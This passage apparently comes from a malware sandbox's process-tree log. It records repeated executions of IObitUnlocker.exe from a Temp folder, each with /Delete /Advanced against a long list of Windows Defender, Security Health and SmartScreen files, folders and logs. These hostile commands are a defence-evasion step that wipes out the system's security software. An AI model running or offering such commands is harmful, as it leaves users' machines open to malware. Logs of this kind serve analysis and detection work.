Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6356
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7092
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7324
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7576
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7824
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8124
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6804
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7444
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7052
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 